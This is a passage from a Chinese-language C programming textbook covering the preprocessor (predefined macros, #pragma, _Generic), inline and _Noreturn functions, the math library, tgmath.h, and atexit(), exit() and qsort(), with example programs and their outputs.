#include "vax.h" #elif defined (MAC) #include "mac.h" #else 1234 #include "general.h" #endif 如果在VAX机上运行这几行代码,那么应该在文件前面用下面的代码定 义VAX: #define VAX 条件编译还有一个用途是让程序更容易移植。改变文件开头部分的几个 关键的定义,即可根据不同的系统设置不同的值和包含不同的文件。 16.6.4 预定义宏 C标准规定了一些预定义宏,如表16.1所列。 表16.1 预 定 义 宏 C99 标准提供一个名为_ _func_ _的预定义标识符,它展开为一个代表 函数名的字符串(该函数包含该标识符)。那么,_ _func_ _必须具有函数 作用域,而从本质上看宏具有文件作用域。因此,_ _func_ _是C语言的预定 义标识符,而不是预定义宏。 程序清单16.12 中使用了一些预定义宏和预定义标识符。注意,其中一 些是C99 新增的,所以不支持C99的编译器可能无法识别它们。如果使用 GCC,必须设置-std=c99或-std=c11。 1235 程序清单16.12 predef.c程序 // predef.c -- 预定义宏和预定义标识符 #include <stdio.h> void why_me(); int main() { printf("The file is %s.\n", __FILE__); printf("The date is %s.\n", __DATE__); printf("The time is %s.\n", __TIME__); printf("The version is %ld.\n", __STDC_VERSION__); printf("This is line %d.\n", __LINE__); printf("This function is %s\n", __func__); why_me(); return 0; } void why_me() { printf("This function is %s\n", __func__); printf("This is line %d.\n", __LINE__); 1236 } 下面是该程序的输出: The file is predef.c. The date is Sep 23 2013. The time is 22:01:09. The version is 201112. This is line 11. This function is main This function is why_me This is line 21. 16.6.5 #line和#error #line指令重置_ _LINE_ _和_ _FILE_ _宏报告的行号和文件名。可以这 样使用#line: #line 1000       // 把当前行号重置为1000 #line 10 "cool.c"   // 把行号重置为10,把文件名重置为cool.c #error 指令让预处理器发出一条错误消息,该消息包含指令中的文本。 如果可能的话,编译过程应该中断。可以这样使用#error指令: #if _ _STDC_VERSION_ _ != 201112L #error Not C11 #endif 1237 编译以上代码生成后,输出如下: $ gcc newish.c newish.c:14:2: error: #error Not C11 $ gcc -std=c11 newish.c $ 如果编译器只支持旧标准,则会编译失败,如果支持C11标准,就能成 功编译。 16.6.6 #pragma 在现在的编译器中,可以通过命令行参数或IDE菜单修改编译器的一些 设置。#pragma把编译器指令放入源代码中。例如,在开发C99时,标准被 称为C9X,可以使用下面的编译指示(pragma)让编译器支持C9X: #pragma c9x on 一般而言,编译器都有自己的编译指示集。例如,编译指示可能用于控 制分配给自动变量的内存量,或者设置错误检查的严格程度,或者启用非标 准语言特性等。C99 标准提供了 3 个标准编译指示,但是超出了本书讨论的 范围。 C99还提供_Pragma预处理器运算符,该运算符把字符串转换成普通的 编译指示。例如: _Pragma("nonstandardtreatmenttypeB on") 等价于下面的指令: #pragma nonstandardtreatmenttypeB on 由于该运算符不使用#符号,所以可以把它作为宏展开的一部分: 1238 #define PRAGMA(X) _Pragma(#X) #define LIMRG(X) PRAGMA(STDC CX_LIMITED_RANGE X) 然后,可以使用类似下面的代码: LIMRG ( ON ) 顺带一提,下面的定义看上去没问题,但实际上无法正常运行: #define LIMRG(X) _Pragma(STDC CX_LIMITED_RANGE #X) 问题在于这行代码依赖字符串的串联功能,而预处理过程完成之后才会 串联字符串。 _Pragma 运算符完成“解字符串”(destringizing)的工作,即把字符串中 的转义序列转换成它所代表的字符。因此, _Pragma("use_bool \"true \"false") 变成了: #pragma use_bool "true "false 16.6.7 泛型选择(C11) 在程序设计中,泛型编程(generic programming)指那些没有特定类 型,但是一旦指定一种类型,就可以转换成指定类型的代码。例如,C++在 模板中可以创建泛型算法,然后编译器根据指定的类型自动使用实例化代 码。C没有这种功能。然而,C11新增了一种表达式,叫作泛型选择表达式 (generic selection expression),可根据表达式的类型(即表达式的类型是 int、double 还是其他类型)选择一个值。泛型选择表达式不是预处理器指 令,但是在一些泛型编程中它常用作#define宏定义的一部分。 下面是一个泛型选择表达式的示例: 1239 _Generic(x, int: 0, float: 1, double: 2, default: 3) _Generic是C11的关键字。_Generic后面的圆括号中包含多个用逗号分隔 的项。第1个项是一个表达式,后面的每个项都由一个类型、一个冒号和一 个值组成,如float: 1。第1个项的类型匹配哪个标签,整个表达式的值是该 标签后面的值。例如,假设上面表达式中x是int类型的变量,x的类型匹配 int:标签,那么整个表达式的值就是0。如果没有与类型匹配的标签,表达式 的值就是default:标签后面的值。泛型选择语句与 switch 语句类似,只是前 者用表达式的类型匹配标签,而后者用表达式的值匹配标签。 下面是一个把泛型选择语句和宏定义组合的例子: #define MYTYPE(X) _Generic((X),\ int: "int",\ float : "float",\ double: "double",\ default: "other"\ ) 宏必须定义为一条逻辑行,但是可以用\把一条逻辑行分隔成多条物理 行。在这种情况下,对泛型选择表达式求值得字符串。例如,对 MYTYPE(5)求值得"int",因为值5的类型与int:标签匹配。程序清单16.13演 示了这种用法。 程序清单16.13 mytype.c程序 // mytype.c #include <stdio.h> 1240 #define MYTYPE(X) _Generic((X),\ int: "int",\ float : "float",\ double: "double",\ default: "other"\ ) int main(void) { int d = 5; printf("%s\n", MYTYPE(d));   // d 是int类型 printf("%s\n", MYTYPE(2.0*d)); // 2.0 * d 是double类型 printf("%s\n", MYTYPE(3L));   // 3L 是long类型 printf("%s\n", MYTYPE(&d));  // &d 的类型是 int * return 0; } 下面是该程序的输出: int double other 1241 other MYTYPE()最后两个示例所用的类型与标签不匹配,所以打印默认的字 符串。可以使用更多类型标签来扩展宏的能力,但是该程序主要是为了演示 _Generic的基本工作原理。 对一个泛型选择表达式求值时,程序不会先对第一个项求值,它只确定 类型。只有匹配标签的类型后才会对表达式求值。 可以像使用独立类型(“泛型”)函数那样使用_Generic 定义宏。本章后 面介绍 math 库时会给出一个示例。 1242 16.7 内联函数(C99) 通常,函数调用都有一定的开销,因为函数的调用过程包括建立调用、 传递参数、跳转到函数代码并返回。使用宏使代码内联,可以避免这样的开 销。C99还提供另一种方法:内联函数(inline function)。读者可能顾名思 义地认为内联函数会用内联代码替换函数调用。其实C99和C11标准中叙述 的是:“把函数变成内联函数建议尽可能快地调用该函数,其具体效果由实 现定义”。因此,把函数变成内联函数,编译器可能会用内联代码替换函数 调用,并(或)执行一些其他的优化,但是也可能不起作用。 创建内联函数的定义有多种方法。标准规定具有内部链接的函数可以成 为内联函数,还规定了内联函数的定义与调用该函数的代码必须在同一个文 件中。因此,最简单的方法是使用函数说明符 inline 和存储类别说明符 static。通常,内联函数应定义在首次使用它的文件中,所以内联函数也相 当于函数原型。如下所示: #include <stdio.h> inline static void eatline()  // 内联函数定义/原型 { while (getchar() != '\n') continue; } int main() { ... 1243 eatline();       // 函数调用 ... } 编译器查看内联函数的定义(也是原型),可能会用函数体中的代码替 换 eatline()函数调用。也就是说,效果相当于在函数调用的位置输入函数体 中的代码: #include <stdio.h> inline static void eatline() //内联函数定义/原型 { while (getchar() != '\n') continue; } int main() { ... while (getchar() != '\n') //替换函数调用 continue; ... } 由于并未给内联函数预留单独的代码块,所以无法获得内联函数的地址 1244 (实际上可以获得地址,不过这样做之后,编译器会生成一个非内联函 数)。另外,内联函数无法在调试器中显示。 内联函数应该比较短小。把较长的函数变成内联并未节约多少时间,因 为执行函数体的时间比调用函数的时间长得多。 编译器优化内联函数必须知道该函数定义的内容。这意味着内联函数定 义与函数调用必须在同一个文件中。鉴于此,一般情况下内联函数都具有内 部链接。因此,如果程序有多个文件都要使用某个内联函数,那么这些文件 中都必须包含该内联函数的定义。最简单的做法是,把内联函数定义放入头 文件,并在使用该内联函数的文件中包含该头文件即可。 // eatline.h #ifndef EATLINE_H_ #define EATLINE_H_ inline static void eatline() { while (getchar() != '\n') continue; } #endif 一般都不在头文件中放置可执行代码,内联函数是个特例。因为内联函 数具有内部链接,所以在多个文件中定义同一个内联函数不会产生什么问 题。 与C++不同的是,C还允许混合使用内联函数定义和外部函数定义(具 1245 有外部链接的函数定义)。例如,一个程序中使用下面3个文件: //file1.c ... inline static double square(double); double square(double x) { return x * x; } int main() { double q = square(1.3); ... //file2.c ... double square(double x) { return (int) (x*x); } void spam(double v) { double kv = square(v); ... //file3.c ... inline double square(double x) { return (int) (x * x + 0.5); } 1246 void masp(double w) { double kw = square(w); ... 如上述代码所示,3个文件中都定义了square()函数。file1.c文件中是 inline static定义;file2.c 文件中是普通的函数定义(因此具有外部链接); file3.c 文件中是 inline 定义,省略了static。 3个文件中的函数都调用了square()函数,这会发生什么情况?。file1.c 文件中的main()使用square()的局部static定义。由于该定义也是inline定义, 所以编译器有可能优化代码,也许会内联该函数。file2.c 文件中,spam()函 数使用该文件中 square()函数的定义,该定义具有外部链接,其他文件也可 见。file3.c文件中,编译器既可以使用该文件中square()函数的内联定义,也 可以使用file2.c文件中的外部链接定义。如果像file3.c那样,省略file1.c文件 inline定义中的static,那么该inline定义被视为可替换的外部定义。 注意GCC在C99之前就使用一些不同的规则实现了内联函数,所以GCC 可以根据当前编译器的标记来解释inline。 1247 16.8 _Noreturn函数(C11) C99新增inline关键字时,它是唯一的函数说明符(关键字extern和static 是存储类别说明符,可应用于数据对象和函数)。C11新增了第2个函数说 明符_Noreturn,表明调用完成后函数不返回主调函数。exit()函数是 _Noreturn 函数的一个示例,一旦调用exit(),它不会再返回主调函数。注 意,这与void返回类型不同。void类型的函数在执行完毕后返回主调函数, 只是它不提供返回值。 _Noreturn的目的是告诉用户和编译器,这个特殊的函数不会把控制返回 主调程序。告诉用户以免滥用该函数,通知编译器可优化一些代码。 1248 16.9 C库 最初,并没有官方的C库。后来,基于UNIX的C实现成为了标准。ANSI C委员会主要以这个标准为基础,开发了一个官方的标准库。在意识到C语 言的应用范围不断扩大后,该委员会重新定义了这个库,使之可以应用于其 他系统。 我们讨论过一些标准库中的 I/O 函数、字符函数和字符串函数。本章将 介绍更多函数。不过,首先要学习如何使用库。 16.9.1 访问C库 如何访问C库取决于实现,因此你要了解当前系统的一般情况。首先, 可以在多个不同的位置找到库函数。例如,getchar()函数通常作为宏定义在 stdio.h头文件中,而strlen()通常在库文件中。其次,不同的系统搜索这些函 数的方法不同。下面介绍3种可能的方法。 1.自动访问 在一些系统中,只需编译程序,就可使用一些常用的库函数。 记住,在使用函数之前必须先声明函数的类型,通过包含合适的头文件 即可完成。在描述库函数的用户手册中,会指出使用某函数时应包含哪个头 文件。但是在一些旧系统上,可能必须自己输入函数声明。再次提醒读者, 用户手册中指明了函数类型。另外,附录B“参考资料”中根据头文件分组, 总结了ANSI C库函数。 过去,不同的实现使用的头文件名不同。ANSI C标准把库函数分为多 个系列,每个系列的函数原型都放在一个特定的头文件中。 2.文件包含 如果函数被定义为宏,那么可以通过#include 指令包含定义宏函数的文 件。通常,类似的宏都放在合适名称的头文件中。例如,许多系统(包括所 1249 有的ANSI C系统)都有ctype.h文件,该文件中包含了一些确定字符性质(如 大写、数字等)的宏。 3.库包含 在编译或链接程序的某些阶段,可能需要指定库选项。即使在自动检查 标准库的系统中,也会有不常用的函数库。必须通过编译时选项显式指定这 些库。注意,这个过程与包含头文件不同。头文件提供函数声明或原型,而 库选项告诉系统到哪里查找函数代码。虽然这里无法涉及所有系统的细节, 但是可以提醒读者应该注意什么。 16.9.2 使用库描述 篇幅有限,我们无法讨论完整的库。但是,可以看几个具有代表性的示 例。首先,了解函数文档。 可以在多个地方找到函数文档。你所使用的系统可能有在线手册,集成 开发环境通常都有在线帮助。C实现的供应商可能提供描述库函数的纸质版 用户手册,或者把这些材料放在CD-ROM中或网上。有些出版社也出版C库 函数的参考手册。这些材料中,有些是一般材料,有些则是针对特定实现 的。本书附录B中提供了一个库函数的总结。 阅读文档的关键是看懂函数头。许多内容随时间变化而变化。下面是旧 的UNIX文档中,关于fread()的描述: #include <stdio.h> fread(ptr, sizeof(*ptr), nitems, stream) FILE *stream; 首先,给出了应该包含的文件,但是没有给出fread()、ptr、sizeof(*ptr) 或nitems的类型。过去,默认类型都是int,但是从描述中可以看出ptr是一个 指针(在早期的C中,指针被作为整数处理)。参数stream声明为指向FILE 1250 的指针。上面的函数声明中的第2个参数看上去像是sizeof运算符,而实际上 这个参数的值应该是ptr所指向对象的大小。虽然用sizeof作为参数没什么问 题,但是用int类型的值作为参数更符合语法。 后来,上面的描述变成了: #include <stdio.h> int fread(ptr, size, nitems, stream;) char *ptr; int size, nitems; FILE *stream; 现在,所有的类型都显式说明,ptr作为指向char的指针。 ANSI C90标准提供了下面的描述: #include <stdio.h> size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream); 首先,使用了新的函数原型格式。其次,改变了一些类型。size_t 类型 被定义为 sizeof 运算符的返回值类型——无符号整数类型,通常是unsigned int或unsigned long。stddef.h文件中包含了size_t类型的typedef或#define定义。 其他文件(包括stdio.h)通过包含stddef.h来包含这个定义。许多函数(包括 fread())的实际参数中都要使用sizeof运算符,形式参数的size_t类型中正好 匹配这种常见的情况。 另外,ANSI C把指向void的指针作为一种通用指针,用于指针指向不同 类型的情况。例如,fread()的第1个参数可能是指向一个double类型数组的指 针,也可能是指向其他类型结构的指针。如果假设实际参数是一个指向内含 20个double类型元素数组的指针,且形式参数是指向void的指针,那么编译 1251 器会选用合适的类型,不会出现类型冲突的问题。 C99/C11标准在以上的描述中加入了新的关键字restric: #include <stdio.h> size_t fread(void * restrict ptr, size_t size,size_t nmemb, FILE * restrict stream); 接下来,我们讨论一些特殊的函数。 1252 16.10 数学库 数学库中包含许多有用的数学函数。math.h头文件提供这些函数的原 型。表16.2中列出了一些声明在 math.h 中的函数。注意,函数中涉及的角度 都以弧度为单位(1 弧度=180/π=57.296 度)。参考资料 V“新增C99和C11标 准的ANSI C库”列出了C99和C11标准的所有函数。 表16.2 ANSI C标准的一些数学函数 16.10.1 三角问题 我们可以使用数学库解决一些常见的问题:把x/y坐标转换为长度和角 度。例如,在网格上画了一条线,该线条水平穿过了4个单元(x的值),垂 直穿过了3个单元(y的值)。那么,该线的长度(量)和方向是什么?根据 数学的三角公式可知: 大小 =square root (x2+y2) 1253 角度 = arctan(y/x) 数学库提供平方根函数和一对反正切函数,所以可以用C程序表示这个 问题。平方根函数是sqrt(),接受一个double类型的参数,并返回参数的平方 根,也是double类型。 atan()函数接受一个double类型的参数(即正切值),并返回一个角度 (该角度的正切值就是参数值)。但是,当线的x值和y值均为-5时,atan() 函数产生混乱。因为(-5)/(-5)得1,所以atan()返回45°,该值与x和y均为5时的 返回值相同。也就是说,atan()无法区分角度相同但反向相反的线(实际 上,atan()返回值的单位是弧度而不是度,稍后介绍两者的转换)。 当然,C库还提供了atan2()函数。它接受两个参数:x的值和y的值。这 样,通过检查x和y的正负号就可以得出正确的角度值。atan2()和 atan()均返 回弧度值。把弧度转换为度,只需将弧度值乘以180,再除以pi即可。pi的 值通过计算表达式4*atan(1)得到。程序清单16.13演示了这些步骤。另外,学 习该程序还复习了结构和typedef相关的知识。 程序清单16.14 rect_pol.c程序 /* rect_pol.c -- 把直角坐标转换为极坐标 */ #include <stdio.h> #include <math.h> #define RAD_TO_DEG (180/(4 * atan(1))) typedef struct polar_v { double magnitude; double angle; } Polar_V; 1254 typedef struct rect_v { double x; double y; } Rect_V; Polar_V rect_to_polar(Rect_V); int main(void) { Rect_V input; Polar_V result; puts("Enter x and y coordinates; enter q to quit:"); while (scanf("%lf %lf", &input.x, &input.y) == 2) { result = rect_to_polar(input); printf("magnitude = %0.2f, angle = %0.2f\n", result.magnitude, result.angle); } puts("Bye."); return 0; } 1255 Polar_V rect_to_polar(Rect_V rv) { Polar_V pv; pv.magnitude = sqrt(rv.x * rv.x + rv.y * rv.y); if (pv.magnitude == 0) pv.angle = 0.0; else pv.angle = RAD_TO_DEG * atan2(rv.y, rv.x); return pv; } 下面是运行该程序后的一个输出示例: Enter x and y coordinates; enter q to quit: 10 10 magnitude = 14.14, angle = 45.00 -12 -5 magnitude = 13.00, angle = -157.38 q Bye. 如果编译时出现下面的消息: 1256 Undefined: _sqrt 或 'sqrt': unresolved external 或者其他类似的消息,表明编译器链接器没有找到数学库。UNIX系统 会要求使用-lm标记(flag)指示链接器搜索数学库: cc rect_pol.c –lm 注意,-lm标记在命令行的末尾。因为链接器在编译器编译C文件后才开 始处理。在Linux中使用GCC编译器可能要这样写: gcc rect_pol.c -lm 16.10.2 类型变体 基本的浮点型数学函数接受double类型的参数,并返回double类型的 值。当然,也可以把float或 long double 类型的参数传递给这些函数,它们仍 然能正常工作,因为这些类型的参数会被转换成double类型。这样做很方 便,但并不是最好的处理方式。如果不需要双精度,那么用float类型的单精 度值来计算会更快些。而且把long double类型的值传递给double类型的形参 会损失精度,形参获得的值可能不是原来的值。为了解决这些潜在的问题, C标准专门为float类型和long double类型提供了标准函数,即在原函数名前 加上f或l前缀。因此,sqrtf()是sqrt()的float版本,sqrtl()是sqrt()的long double 版本。 利用C11 新增的泛型选择表达式定义一个泛型宏,根据参数类型选择最 合适的数学函数版本。程序清单16.15演示了两种方法。 程序清单16.15 generic.c程序 // generic.c -- 定义泛型宏 1257 #include <stdio.h> #include <math.h> #define RAD_TO_DEG (180/(4 * atanl(1))) // 泛型平方根函数 #define SQRT(X) _Generic((X),\ long double: sqrtl, \ default: sqrt, \ float: sqrtf)(X) // 泛型正弦函数,角度的单位为度 #define SIN(X) _Generic((X),\ long double: sinl((X)/RAD_TO_DEG),\ default:  sin((X)/RAD_TO_DEG),\ float:   sinf((X)/RAD_TO_DEG)\ ) int main(void) { float x = 45.0f; double xx = 45.0; long double xxx = 45.0L; 1258 long double y = SQRT(x); long double yy = SQRT(xx); long double yyy = SQRT(xxx); printf("%.17Lf\n", y);   // 匹配 float printf("%.17Lf\n", yy);  // 匹配 default printf("%.17Lf\n", yyy);  // 匹配 long double int i = 45; yy = SQRT(i);        // 匹配 default printf("%.17Lf\n", yy); yyy = SIN(xxx);       // 匹配 long double printf("%.17Lf\n", yyy); return 0; } 下面是该程序的输出: 6.70820379257202148 6.70820393249936942 6.70820393249936909 6.70820393249936942 0.70710678118654752 1259 如上所示,SQRT(i)和SQRT(xx)的返回值相同,因为它们的参数类型分 别是int和double,所以只能与default标签对应。 有趣的一点是,如何让_Generic 宏的行为像一个函数。SIN()的定义也 许提供了一个方法:每个带标号的值都是函数调用,所以_Generic表达式的 值是一个特定的函数调用,如sinf((X)/RAD_TO_DEG),用传入SIN()的参数 替换X。 SQRT()的定义也许更简洁。_Generic表达式的值就是函数名,如sinf。 函数的地址可以代替该函数名,所以_Generic表达式的值是一个指向函数的 指针。然而,紧随整个_Generic表达式之后的是(X),函数指针(参数)表示函 数指针。因此,这是一个带指定的参数的函数指针。 简而言之,对于 SIN(),函数调用在泛型选择表达式内部;而对于 SQRT(),先对泛型选择表达式求值得一个指针,然后通过该指针调用它所 指向的函数。 16.10.3 tgmath.h库(C99) C99标准提供的tgmath.h头文件中定义了泛型类型宏,其效果与程序清单 16.15类似。如果在math.h中为一个函数定义了3种类型(float、double和long double)的版本,那么tgmath.h文件就创建一个泛型类型宏,与原来 double 版本的函数名同名。例如,根据提供的参数类型,定义 sqrt()宏展开为 sqrtf()、sqrt()或 sqrtl()函数。换言之,sqrt()宏的行为和程序清单 16.15 中的 SQRT()宏类似。 如果编译器支持复数运算,就会支持complex.h头文件,其中声明了与 复数运算相关的函数。例如,声明有 csqrtf()、csqrt()和 csqrtl(),这些函数 分别返回 float complex、double complex和long double complex类型的复数平 方根。如果提供这些支持,那么tgmath.h中的sqrt()宏也能展开为相应的复数 平方根函数。 如果包含了tgmath.h,要调用sqrt()函数而不是sqrt()宏,可以用圆括号把 1260 被调用的函数名括起来: #include <tgmath.h> ... float x = 44.0; double y; y = sqrt(x);    // 调用宏,所以是 sqrtf(x) y = (sqrt)(x);  // 调用函数 sqrt() 这样做没问题,因为类函数宏的名称必须用圆括号括起来。圆括号只会 影响操作顺序,不会影响括起来的表达式,所以这样做得到的仍然是函数调 用的结果。实际上,在讨论函数指针时提到过,由于C语言奇怪而矛盾的函 数指针规则,还也可以使用(*sqrt)()的形式来调用sqrt()函数。 不借助C标准以外的机制,C11新增的_Generic表达式是实现tgmath.h最 简单的方式。 1261 16.11 通用工具库 通用工具库包含各种函数,包括随机数生成器、查找和排序函数、转换 函数和内存管理函数。第12章介绍过rand()、srand()、malloc()和free()函数。 在ANSI C标准中,这些函数的原型都在stdlib.h头文件中。附录B参考资料V 列出了该系列的所有函数。现在,我们来进一步讨论其中的几个函数。 16.11.1 exit()和atexit()函数 在前面的章节中我们已经在程序示例中用过 exit()函数。而且,在 main()返回系统时将自动调用exit()函数。ANSI 标准还新增了一些不错的功 能,其中最重要的是可以指定在执行 exit()时调用的特定函数。atexit()函数 通过退出时注册被调用的函数提供这种功能,atexit()函数接受一个函数指针 作为参数。程序清单16.16演示了它的用法。 程序清单16.16 byebye.c程序 /* byebye.c -- atexit()示例 */ #include <stdio.h> #include <stdlib.h> void sign_off(void); void too_bad(void); int main(void) { int n; atexit(sign_off);   /* 注册 sign_off()函数 */ 1262 puts("Enter an integer:"); if (scanf("%d", &n) != 1) { puts("That's no integer!"); atexit(too_bad); /* 注册 too_bad()函数 */ exit(EXIT_FAILURE); } printf("%d is %s.\n", n, (n % 2 == 0) ? "even" : "odd"); return 0; } void sign_off(void) { puts("Thus terminates another magnificent program from"); puts("SeeSaw Software!"); } void too_bad(void) { puts("SeeSaw Software extends its heartfelt condolences"); puts("to you upon the failure of your program."); 1263 } 下面是该程序的一个运行示例: Enter an integer: 212 212 is even. Thus terminates another magnificent program from SeeSaw Software! 如果在IDE中运行,可能看不到最后两行。下面是另一个运行示例: Enter an integer: what? That's no integer! SeeSaw Software extends its heartfelt condolences to you upon the failure of your program. Thus terminates another magnificent program from SeeSaw Software! 在IDE中运行,可能看不到最后4行。 接下来,我们讨论atexit()和exit()的参数。 1.atexit()函数的用法 这个函数使用函数指针。要使用 atexit()函数,只需把退出时要调用的 1264 函数地址传递给 atexit()即可。函数名作为函数参数时相当于该函数的地 址,所以该程序中把sign_off或too_bad作为参数。然后,atexit()注册函数列 表中的函数,当调用exit()时就会执行这些函数。ANSI保证,在这个列表中 至少可以放 32 个函数。最后调用 exit()函数时,exit()会执行这些函数(执 行顺序与列表中的函数顺序相反,即最后添加的函数最先执行)。 注意,输入失败时,会调用sign_off()和too_bad()函数;但是输入成功时 只会调用sign_off()。因为只有输入失败时,才会进入if语句中注册 too_bad()。另外还要注意,最先调用的是最后一个被注册的函数。 atexit()注册的函数(如sign_off()和too_bad())应该不带任何参数且返回 类型为void。通常,这些函数会执行一些清理任务,例如更新监视程序的文 件或重置环境变量。 注意,即使没有显式调用exit(),还是会调用sign_off(),因为main()结束 时会隐式调用exit()。 2.exit()函数的用法 exit()执行完atexit()指定的函数后,会完成一些清理工作:刷新所有输出 流、关闭所有打开的流和关闭由标准I/O函数tmpfile()创建的临时文件。然后 exit()把控制权返回主机环境,如果可能的话,向主机环境报告终止状态。 通常,UNIX程序使用0表示成功终止,用非零值表示终止失败。UNIX返回 的代码并不适用于所有的系统,所以ANSI C为了可移植性的要求,定义了 一个名为EXIT_FAILURE的宏表示终止失败。类似地,ANSI C还定义了 EXIT_SUCCESS表示成功终止。不过,exit()函数也接受0表示成功终止。在 ANSI C中,在非递归的main()中使用exit()函数等价于使用关键字return。尽 管如此,在main()以外的函数中使用exit()也会终止整个程序。 16.11.2 qsort()函数 对较大型的数组而言,“快速排序”方法是最有效的排序算法之一。该算 法由C.A.R.Hoare于1962年开发。它把数组不断分成更小的数组,直到变成 1265 单元素数组。首先,把数组分成两部分,一部分的值都小于另一部分的值。 这个过程一直持续到数组完全排序好为止。 快速排序算法在C实现中的名称是qsort()。qsort()函数排序数组的数据 对象,其原型如下: void qsort(void *base, size_t nmemb, size_t size, int (*compar)(const void *, const void *)); 第1个参数是指针,指向待排序数组的首元素。ANSI C允许把指向任何 数据类型的指针强制转换成指向void的指针,因此,qsort()的第1个实际参数 可以引用任何类型的数组。 第2个参数是待排序项的数量。函数原型把该值转换为size_t类型。前面 提到过,size_t定义在标准头文件中,是sizeof运算符返回的整数类型。 由于qsort()把第1个参数转换为void指针,所以qsort()不知道数组中每个 元素的大小。为此,函数原型用第 3 个参数补偿这一信息,显式指明待排序 数组中每个元素的大小。例如,如果排序 double类型的数组,那么第3个参 数应该是sizeof(double)。 最后,qsort()还需要一个指向函数的指针,这个被指针指向的比较函数 用于确定排序的顺序。该函数应接受两个参数:分别指向待比较两项的指 针。如果第1项的值大于第2项,比较函数则返回正数;如果两项相同,则返 回0;如果第1项的值小于第2项,则返回负数。qsort()根据给定的其他信息 计算出两个指针的值,然后把它们传递给比较函数。 qsort()原型中的第4个函数确定了比较函数的形式: int (*compar)(const void *, const void *) 这表明 qsort()最后一个参数是一个指向函数的指针,该函数返回 int 类 型的值且接受两个指向const void的指针作为参数,这两个指针指向待比较 1266 项。 程序清单16.17和后面的讨论解释了如何定义一个比较函数,以及如何 使用qsort()。该程序创建了一个内含随机浮点值的数组,并排序了这个数 组。 程序清单16.17 qsorter.c程序 /* qsorter.c -- 用 qsort()排序一组数字 */ #include <stdio.h> #include <stdlib.h> #define NUM 40 void fillarray(double ar [], int n); void showarray(const double ar [], int n); int mycomp(const void * p1, const void * p2); int main(void) { double vals[NUM]; fillarray(vals, NUM); puts("Random list:"); showarray(vals, NUM); qsort(vals, NUM, sizeof(double), mycomp); puts("\nSorted list:"); 1267 showarray(vals, NUM); return 0; } void fillarray(double ar [], int n) { int index; for (index = 0; index < n; index++) ar[index] = (double) rand() / ((double) rand() + 0.1); } void showarray(const double ar [], int n) { int index; for (index = 0; index < n; index++) { printf("%9.4f ", ar[index]); if (index % 6 == 5) putchar('\n'); } if (index % 6 != 0) 1268 putchar('\n'); } /* 按从小到大的顺序排序 */ int mycomp(const void * p1, const void * p2) { /* 要使用指向double的指针来访问这两个值 */ const double * a1 = (const double *) p1; const double * a2 = (const double *) p2; if (*a1 < *a2) return -1; else if (*a1 == *a2) return 0; else return 1; } 下面是该程序的运行示例: Random list: 0.0001  1.6475  2.4332  0.0693  0.7268  0.7383 24.0357 0.1009  87.1828 5.7361  0.6079  0.6330 1269 1.6058  0.1406  0.5933  1.1943  5.5295  2.2426 0.8364  2.7127  0.2514  0.9593  8.9635  0.7139 0.6249  1.6044  0.8649  2.1577  0.5420  15.0123 1.7931  1.6183  1.9973  2.9333  12.8512 1.3034 0.3032  1.1406  18.7880 0.9887 Sorted list: 0.0001  0.0693  0.1009  0.1406  0.2514  0.3032 0.5420  0.5933  0.6079  0.6249  0.6330  0.7139 0.7268  0.7383  0.8364  0.8649  0.9593  0.9887 1.1406  1.1943  1.3034  1.6044  1.6058  1.6183 1.6475  1.7931  1.9973  2.1577  2.2426  2.4332 2.7127  2.9333  5.5295  5.7361  8.9635  12.8512 15.0123 18.7880 24.0357 87.1828 接下来分析两点:qsort()的用法和mycomp()的定义。 1.qsort()的用法 qsort()函数排序数组的数据对象。该函数的ANSI原型如下: void qsort (void *base, size_t nmemb, size_t size, int (*compar)(const void *, const void *)); 第1个参数值指向待排序数组首元素的指针。在该程序中,实际参数是 1270 double类型的数组名vals,因此指针指向该数组的首元素。根据该函数的原 型,参数 vals 会被强制转换成指向 void 的指针。由于ANSI C允许把指向任 何数据类型的指针强制转换成指向void的指针,所以qsort()的第1个实际参数 可以引用任何类型的数组。 第2个参数是待排序项的数量。在程序清单16.17中是NUM,即数组元素 的数量。函数原型把该值转换为size_t类型。 第3个参数是数组中每个元素占用的空间大小,本例中为 sizeof(double)。 最后一个参数是mycomp,这里函数名即是函数的地址,该函数用于比 较元素。 2.mycomp()的定义 前面提到过,qsort()的原型中规定了比较函数的形式: int (*compar)(const void *, const void *) 这表明 qsort()最后一个参数是一个指向函数的指针,该函数返回 int 类 型的值且接受两个指向const void的指针作为参数。程序中mycomp()使用的 就是这个原型: int mycomp(const void * p1, const void * p2); 记住,函数名作为参数时即是指向该函数的指针。因此,mycomp与 compar原型相匹配。 qsort()函数把两个待比较元素的地址传递给比较函数。在该程序中,把 待比较的两个double类型值的地址赋给p1和p2。注意,qsort()的第1个参数引 用整个数组,比较函数中的两个参数引用数组中的两个元素。这里存在一个 问题。为了比较指针所指向的值,必须解引用指针。因为值是 double 类 型,所以要把指针解引用为 double 类型的值。然而,qsort()要求指针指向 1271 void。要解决这个问题,必须在比较函数的内部声明两个类型正确的指针, 并初始化它们分别指向作为参数传入的值: /* 按从小到大的顺序排序值 */ int mycomp(const void * p1, const void * p2) { /* 使用指向double类型的指针访问值 */ const double * a1 = (const double *) p1; const double * a2 = (const double *) p2; if (*a1 < *a2) return -1; else if (*a1 == *a2) return 0; else return 1; } 简而言之,为了让该方法具有通用性,qsort()和比较函数使用了指向 void 的指针。因此,必须把数组中每个元素的大小明确告诉qsort(),并且在 比较函数的定义中,必须把该函数的指针参数转换为对具体应用而言类型正 确的指针。 注意C和C++中的void* 1272 C和C++对待指向void的指针有所不同。在这两种语言中,都可以把任 何类型的指针赋给void类型的指针。例如,程序清单16.17中,qsort()的函数 调用中把double*指针赋给void*指针。但是,C++要求在把void*指针赋给任 何类型的指针时必须进行强制类型转换。而C没有这样的要求。例如,程序 清单16.17中的mycomp()函数,就使用了这样的强制类型转换: const double * a1 = (const double *) p1; 这种强制类型转换,在C中是可选的,但在C++中是必须的。因为两种 语言都使用强制类型转换,所以遵循C++的要求也无不妥。将来如果要把该 程序转成C++,就不必更改这部分的代码。 下面再来看一个比较函数的例子。假设有下面的声明: struct names { char first[40]; char last[40]; }; struct names staff[100]; 如何调用qsort()?模仿程序清单16.17中qsort()的函数调用,应该是这 样: qsort(staff, 100, sizeof(struct names), comp); 这里 comp 是比较函数的函数名。那么,应如何编写这个函数?假设要 先按姓排序,如果同姓再按名排序,可以这样编写该函数: #include <string.h> int comp(const void * p1, const void * p2) /* 该函数的形式必须是这样 */ 1273 { /* 得到正确类型的指针 */ const struct names *ps1 = (const struct names *) p1; const struct names *ps2 = (const struct names *) p2; int res; res = strcmp(ps1->last, ps2->last); /* 比较姓 